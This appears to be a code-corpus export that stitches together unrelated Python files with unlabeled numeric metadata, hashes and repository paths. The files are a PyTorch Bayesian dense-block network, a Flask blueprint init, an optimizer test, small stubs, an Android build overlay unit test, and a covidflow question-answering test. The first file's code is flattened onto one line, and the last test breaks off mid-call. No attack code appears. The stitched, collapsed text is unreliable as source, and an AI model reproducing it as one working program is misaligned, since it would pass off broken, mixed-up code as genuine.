# # # # # # o13 = self.batchnorm4(o12) # # # o14 = self.prelu(o13) # # # o15 = self.conv4(o14) out = o4 if depth >= 2: o5 = self.batchnorm2(o4) o6 = self.prelu(o5) o7 = self.conv2(o6) o8 = o4 + o7 out = o8 if depth >= 3: o9 = self.batchnorm3(o8) o10 = self.prelu(o9) o11 = self.conv3(o10) o12 = o11 + o8 out = o12 if depth >= 4: o13 = self.batchnorm4(o12) o14 = self.prelu(o13) o15 = self.conv4(o14) o16 = o15 + o12 out = o16 if depth > 4: raise Exception('Depth more than 4 does not supported!!!') return out class FullBayesianDenseBlock(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianDenseBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int(params['num_filters'] + params['num_filters']) self.conv1_mu = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2_mu = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3_mu = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.conv1_sigma = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2_sigma = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3_sigma = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.tanh = nn.Tanh() self.normal = tdist.Normal(torch.tensor([0.0]), torch.tensor([1.0])) if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def reparameterization(self, x_mean, x_sigma): # using logvar as log(sigma**2) or 2*log(sigma) sz = x_sigma.size() x_sigma_noise = torch.mul((x_sigma/2).exp(), self.normal.sample(sz).squeeze().cuda()) out = x_mean + x_sigma_noise return out def get_kl_loss(self, mu, logvar): # using logvar as log(sigma**2) or 2*log(sigma) kl_loss = -0.5 * torch.mean(1 + logvar - mu.pow(2) - logvar.exp()) return kl_loss def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ o1_mu = self.conv1_mu(input) o1_sigma = self.conv1_sigma(input) o2_mu = self.tanh(o1_mu) o2_sigma = self.tanh(o1_sigma) o3 = self.reparameterization(o2_mu, o2_sigma) kl_1 = self.get_kl_loss(o2_mu, o2_sigma) o4 = torch.cat((input, o3), dim=1) o5_mu = self.conv2_mu(o4) o5_sigma = self.conv2_sigma(o4) o6_mu = self.tanh(o5_mu) o6_sigma = self.tanh(o5_sigma) o7 = self.reparameterization(o6_mu, o6_sigma) kl_2 = self.get_kl_loss(o6_mu, o6_sigma) o8 = torch.cat((o3, o7), dim=1) o9_mu = self.conv3_mu(o8) o9_sigma = self.conv3_sigma(o8) o10_mu = self.tanh(o9_mu) o10_sigma = self.tanh(o9_sigma) out = self.reparameterization(o10_mu, o10_sigma) kl_3 = self.get_kl_loss(o10_mu, o10_sigma) kl_loss = 0.33 * (kl_1 + kl_2 + kl_3) return out, kl_loss class FullBayesianEncoderBlock(FullBayesianDenseBlock): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianEncoderBlock, self).__init__(params, se_block_type=se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block, kl_loss = super(FullBayesianEncoderBlock, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices, kl_loss class FullBayesianDecoderBlock(FullBayesianDenseBlock): """Dense decoder block with maxunpool and an optional skip connections and SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianDecoderBlock, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: Implement Conv Transpose print("You have to use Conv Transpose") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block, kl_loss = super(FullBayesianDecoderBlock, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block, kl_loss
38.698444
146
0.58813
4,825
39,782
4.658238
0.050984
0.027718
0.030833
0.024026
0.844056
0.834624
0.82795
0.819585
0.806905
0.79418
0
0.021062
0.298225
39,782
1,027
147
38.736125
0.78401
0.352471
0
0.677966
0
0
0.067436
0
0
0
0
0.002921
0
1
0.076271
false
0
0.010593
0
0.163136
0.006356
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
3b2030e0fb65fbf77df1b38a50ff4028317a6e41
116
py
Python
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
null
null
null
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
6
2019-12-26T16:38:51.000Z
2020-01-06T18:55:03.000Z
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
null
null
null
from flask import Blueprint debug = Blueprint('debug', __name__, template_folder='templates') from . import views
19.333333
65
0.775862
14
116
6.071429
0.714286
0.329412
0
0
0
0
0
0
0
0
0
0
0.12931
116
5
66
23.2
0.841584
0
0
0
0
0
0.12069
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
3b4e1cac62e15c368308150fd45077b3f6c6c900
2,041
py
Python
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
1
2022-02-25T03:14:48.000Z
2022-02-25T03:14:48.000Z
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
from gradient_free_optimizers.optimizers import search_tracker import pytest from gradient_free_optimizers import ( HillClimbingOptimizer, StochasticHillClimbingOptimizer, RepulsingHillClimbingOptimizer, SimulatedAnnealingOptimizer, DownhillSimplexOptimizer, RandomSearchOptimizer, GridSearchOptimizer, RandomRestartHillClimbingOptimizer, PowellsMethod, PatternSearch, RandomAnnealingOptimizer, ParallelTemperingOptimizer, ParticleSwarmOptimizer, EvolutionStrategyOptimizer, BayesianOptimizer, TreeStructuredParzenEstimators, ForestOptimizer, OneDimensionalBayesianOptimization, ParallelAnnealingOptimizer, EnsembleOptimizer, LocalBayesianOptimizer, VariableResolutionBayesianOptimizer, EvoSubSpaceBayesianOptimizer, ) from surfaces.test_functions import SphereFunction optimizers = ( "Optimizer", [ (HillClimbingOptimizer), (StochasticHillClimbingOptimizer), (RepulsingHillClimbingOptimizer), (SimulatedAnnealingOptimizer), (DownhillSimplexOptimizer), (RandomSearchOptimizer), (GridSearchOptimizer), (RandomRestartHillClimbingOptimizer), (PowellsMethod), (PatternSearch), (RandomAnnealingOptimizer), (ParallelTemperingOptimizer), (ParticleSwarmOptimizer), (EvolutionStrategyOptimizer), (BayesianOptimizer), (TreeStructuredParzenEstimators), (ForestOptimizer), (OneDimensionalBayesianOptimization), (ParallelAnnealingOptimizer), (EnsembleOptimizer), (LocalBayesianOptimizer), (VariableResolutionBayesianOptimizer), (EvoSubSpaceBayesianOptimizer), ], ) sphere_function = SphereFunction(n_dim=2, metric="score") @pytest.mark.parametrize(*optimizers) def test_opt_algos_0(Optimizer): opt = Optimizer(sphere_function.search_space()) opt.search(sphere_function, n_iter=15) _ = opt.best_para _ = opt.best_score _ = opt.search_data
27.958904
62
0.733464
109
2,041
13.541284
0.504587
0.028455
0.02168
0.03523
0.752033
0.752033
0.752033
0.752033
0.752033
0.752033
0
0.002445
0.198432
2,041
72
63
28.347222
0.899756
0
0
0
0
0
0.006859
0
0
0
0
0
0
1
0.015625
false
0
0.0625
0
0.078125
0
0
0
1
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8e5f88947c3835217065dd11e5835134dc3d3860
104
py
Python
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
null
null
null
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
null
null
null
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
1
2018-07-24T02:37:44.000Z
2018-07-24T02:37:44.000Z
from .celery_manager import make_celery from .api_consumer_config import * from .celery_config import *
26
39
0.836538
15
104
5.466667
0.533333
0.243902
0
0
0
0
0
0
0
0
0
0
0.115385
104
3
40
34.666667
0.891304
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8e74f86d008428d75e3955506380a6241287a8cb
106
py
Python
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
1
2016-01-05T17:26:08.000Z
2016-01-05T17:26:08.000Z
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
null
null
null
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
null
null
null
class MachopCommand(object): def shutdown(self): pass def cleanup(self): pass
10.6
28
0.575472
11
106
5.545455
0.727273
0.262295
0
0
0
0
0
0
0
0
0
0
0.339623
106
9
29
11.777778
0.871429
0
0
0.4
0
0
0
0
0
0
0
0
0
1
0.4
false
0.4
0
0
0.6
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
8e862dde8b0576bb91f6e2909e00353ca06c999e
222
py
Python
cleverly/agglomerative/__init__.py
rayandrews/clustering-algorithm
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
1
2021-11-03T21:14:08.000Z
2021-11-03T21:14:08.000Z
cleverly/agglomerative/__init__.py
rayandrews/cleverly
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
null
null
null
cleverly/agglomerative/__init__.py
rayandrews/cleverly
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
null
null
null
# from .Agglomerative import Agglomerative # from .linkage import average, average_group, complete, single # __all__ = [ # 'Agglomerative', # 'average', # 'average_group', # 'complete', # 'single' # ]
20.181818
63
0.635135
19
222
7.105263
0.473684
0.207407
0.281481
0.4
0.488889
0
0
0
0
0
0
0
0.225225
222
10
64
22.2
0.784884
0.90991
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
8e93cf78056143ebad2ee79e366db2acb62faee8
9,975
py
Python
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
1
2022-02-10T21:17:20.000Z
2022-02-10T21:17:20.000Z
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
null
null
null
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test overlay.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import shutil import subprocess import tempfile import unittest from . import overlay import re class BindOverlayTest(unittest.TestCase): def setUp(self): self.source_dir = tempfile.mkdtemp() self.destination_dir = tempfile.mkdtemp() os.mkdir(os.path.join(self.source_dir, 'base_dir')) os.mkdir(os.path.join(self.source_dir, 'base_dir', 'base_project')) os.mkdir(os.path.join(self.source_dir, 'base_dir', 'base_project', '.git')) os.mkdir(os.path.join(self.source_dir, 'overlays')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_dir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_dir', '.git')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir', 'from_unittest1')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir', 'from_unittest1', '.git')) os.symlink( os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir'), os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'subdir_symlink') ) open(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_file'), 'a').close() os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir', 'from_unittest2')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir', 'from_unittest2', '.git')) def tearDown(self): shutil.rmtree(self.source_dir) def testValidTargetOverlayBinds(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.source_dir, 'from_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testMultipleOverlays(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' <overlay name="unittest2"/>' ' </target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/upper_subdir/lower_subdir/from_unittest1') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest1') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) bind_source = os.path.join(self.source_dir, 'overlays/unittest2/upper_subdir/lower_subdir/from_unittest2') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest2') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testMultipleOverlaysWithWhitelist(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' <overlay name="unittest2"/>' ' </target>' '</config>' ) test_config.flush() rw_whitelist = set('overlays/unittest1/uppser_subdir/lower_subdir/from_unittest1') o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/upper_subdir/lower_subdir/from_unittest1') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest1') self.assertEqual( bind_mounts[bind_destination], overlay.BindMount(source_dir=bind_source, readonly=False)) bind_source = os.path.join(self.source_dir, 'overlays/unittest2/upper_subdir/lower_subdir/from_unittest2') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest2') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidOverlaidDir(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir, destination_dir=self.destination_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.destination_dir, 'from_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidFilesystemViewDirectoryBind(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <view name="unittestview"/>' ' </target>' ' <view name="unittestview">' ' <path source="overlays/unittest1/from_dir" ' ' destination="to_dir"/>' ' </view>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.source_dir, 'to_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidFilesystemViewFileBind(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <view name="unittestview"/>' ' </target>' ' <view name="unittestview">' ' <path source="overlays/unittest1/from_file" ' ' destination="to_file"/>' ' </view>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_file') bind_destination = os.path.join(self.source_dir, 'to_file') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testInvalidTarget(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() with self.assertRaises(KeyError): overlay.BindOverlay( config_file=test_config.name, target='unknown', source_dir=self.source_dir) if __name__ == '__main__': unittest.main()
39.426877
96
0.626767
1,125
9,975
5.354667
0.129778
0.076195
0.092795
0.081341
0.800631
0.791999
0.791999
0.791999
0.784031
0.777058
0
0.009905
0.240902
9,975
252
97
39.583333
0.785658
0.056441
0
0.684685
0
0
0.261763
0.077177
0
0
0
0
0.067568
1
0.040541
false
0
0.045045
0
0.09009
0.004505
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8e9b411cad2e535c9b32761377b543e387000be4
15,416
py
Python
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
7
2020-05-23T07:07:26.000Z
2021-11-29T05:58:51.000Z
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
210
2020-04-13T17:21:55.000Z
2021-04-20T15:46:26.000Z
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
3
2020-04-09T14:38:09.000Z
2020-07-29T15:06:11.000Z
from unittest.mock import MagicMock, patch from rasa_sdk.events import ActionExecuted, Form, SlotSet, UserUttered from rasa_sdk.forms import REQUESTED_SLOT from covidflow.actions.answers import QuestionAnsweringResponse, QuestionAnsweringStatus from covidflow.actions.question_answering_form import ( ANSWERS_KEY, ANSWERS_SLOT, ASKED_QUESTION_SLOT, FEEDBACK_KEY, FEEDBACK_NOT_GIVEN, FEEDBACK_SLOT, FORM_NAME, QUESTION_KEY, QUESTION_SLOT, SKIP_QA_INTRO_SLOT, STATUS_KEY, STATUS_SLOT, QuestionAnsweringForm, ) from .form_test_helper import FormTestCase def QuestionAnsweringResponseMock(*args, **kwargs): mock = MagicMock(*args, **kwargs) async def mock_coroutine(*args, **kwargs): return mock(*args, **kwargs) mock_coroutine.mock = mock return mock_coroutine DOMAIN = {"responses": {"utter_ask_feedback_error": [{"text": ""}],}} QUESTION = "What is covid?" ANSWERS = [ "It's a virus!", "It's the greatest plea since the plague!", "No, it's SU-PER BAD!", ] SUCCESS_RESULT = QuestionAnsweringResponse( answers=ANSWERS, status=QuestionAnsweringStatus.SUCCESS ) FAILURE_RESULT = QuestionAnsweringResponse(status=QuestionAnsweringStatus.FAILURE) OUT_OF_DISTRIBUTION_RESULT = QuestionAnsweringResponse( status=QuestionAnsweringStatus.OUT_OF_DISTRIBUTION ) NEED_ASSESSMENT_RESULT = QuestionAnsweringResponse( status=QuestionAnsweringStatus.NEED_ASSESSMENT ) FULL_RESULT_SUCCESS = { QUESTION_KEY: QUESTION, ANSWERS_KEY: ANSWERS, STATUS_KEY: QuestionAnsweringStatus.SUCCESS, FEEDBACK_KEY: True, } class TestQuestionAnsweringForm(FormTestCase): def setUp(self): super().setUp() self.form = QuestionAnsweringForm() def test_form_activation_first_time_without_qa_samples(self): tracker = self.create_tracker(active_form=False, intent="ask_question") self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(SKIP_QA_INTRO_SLOT, True), SlotSet(REQUESTED_SLOT, QUESTION_SLOT), ] ) self.assert_templates( [ "utter_can_help_with_questions", "utter_qa_disclaimer", "utter_ask_active_question", ] ) def test_form_activation_first_time_with_qa_samples(self): tracker = self.create_tracker(active_form=False, intent="ask_question") self.run_form( tracker, domain={"responses": {"utter_qa_sample_foo": [{"text": "bar"}]}} ) self.assert_events( [ Form(FORM_NAME), SlotSet(SKIP_QA_INTRO_SLOT, True), SlotSet(REQUESTED_SLOT, QUESTION_SLOT), ] ) self.assert_templates( [ "utter_can_help_with_questions", "utter_qa_disclaimer", "utter_qa_sample", "utter_ask_active_question", ] ) def test_form_activation_not_first_time(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS, SKIP_QA_INTRO_SLOT: True}, active_form=False, intent="ask_question", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) def test_form_activation_affirm(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS}, active_form=False, intent="affirm", text="What is covid?", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) def test_form_activation_fallback(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS, SKIP_QA_INTRO_SLOT: True}, active_form=False, intent="affirm", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_success(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=SUCCESS_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.SUCCESS), SlotSet(ANSWERS_SLOT, ANSWERS), SlotSet(REQUESTED_SLOT, FEEDBACK_SLOT), ] ) self.assert_templates([None, "utter_ask_feedback"]) self.assert_texts([ANSWERS[0], None]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_failure(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=FAILURE_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.FAILURE), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.FAILURE, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_out_of_distribution(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=OUT_OF_DISTRIBUTION_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, 